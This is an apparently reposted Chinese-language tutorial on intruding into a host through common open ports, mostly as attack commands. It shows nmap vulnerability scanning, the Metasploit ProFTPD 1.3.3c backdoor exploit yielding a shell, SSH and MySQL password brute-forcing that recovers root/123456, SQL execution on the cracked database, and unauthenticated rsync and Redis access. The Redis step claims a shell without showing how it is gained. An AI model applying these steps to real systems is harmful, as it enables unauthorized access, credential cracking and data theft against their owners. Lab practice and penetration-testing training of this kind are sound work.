常見端口入侵


.信息收集

nmap命令:

nmap -sS -p 1-65535 -sV 192.168.31.69

nmap --script=vuln 192.168.31.69

.端口利用

21端口入侵

首先看到ftp的版本是proftpd 1.3.3c,經過了解該版本存在后門,利用msf中的模塊可以進行利用,利用過程如下:

利用命令:

msfconsole 啟動終端

search proftpd 搜索利用模塊

use exploit/unix/ftp/proftpd_133c_backdoor 使用后門模塊

show options 查看需要設置的參數

set rhosts 192.168.31.69 設置目標ip

run 攻擊

得到一個shell

22端口入侵

看到22端口就會想到ssh,想到ssh就想爆破一下試試,試試就試試

命令:

search ssh_login 搜索爆破模塊

use auxiliary/scanner/ssh/ssh_login 使用爆破模塊

show options 查看需要設置的參數

set rhosts 192.168.31.69 設置目標ip

set username root 設置用戶名為root

set pass_file /root/passwd.txt 設置密碼字典

set verbose true 顯示爆破信息

run 攻擊

ssh root@192.168.31.69 連接ssh

爆破出密碼,用戶為root密碼為123456,並成功連接上ssh

873端口入侵

873端口搭的服務是rsync,通過百度得知該服務存在未授權訪問漏洞,連接試試

命令:

rsync root@192.168.31.69:: 連接rsync

rsync root@192.168.31.69::www 連接rsync並查看www文件夾內的文件

3306端口入侵

3306端口也是可以嘗試一下爆破,命令如下:

search mysql_login 搜索mysql爆破模塊

use auxiliary/scanner/mysql/mysql_login 使用mysql爆破模塊

show options 查看需要的參數

set rhosts 192.168.31.69 設置目標ip

set username root 設置用戶名

set pass_file /root/passwd.txt 設置密碼字典

run 攻擊

search mysql_sql 搜索執行sql語句模塊

use auxiliary/admin/mysql/mysql_sql 使用該模塊

show options 查看需要的參數

set rhosts 192.168.31.69 設置目標ip

set username root 設置用戶名

set password 123456 設置密碼

set SQL show databases; 設置需要執行的sql語句

run 攻擊

爆破出密碼,用戶名為root,密碼為123456

執行show databases;成功列出所有數據庫名

6379端口入侵

該端口使用的是redis服務,可能存在未授權訪問漏洞,利用該漏洞需要安裝redis,安裝命令如下:

wget http://download.redis.io/releases/redis-2.8.12.tar.gz 下載redis

tar -xzf redis-2.8.12.tar.gz 解壓

cd redis-2.8.12/ 切換到解壓后的目錄下

make 編譯

cd /root/redis-2.8.12/src 切換到這個目錄

./redis-cli -h 192.168.31.69 執行redis-cli連接

 

得到一個shell

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM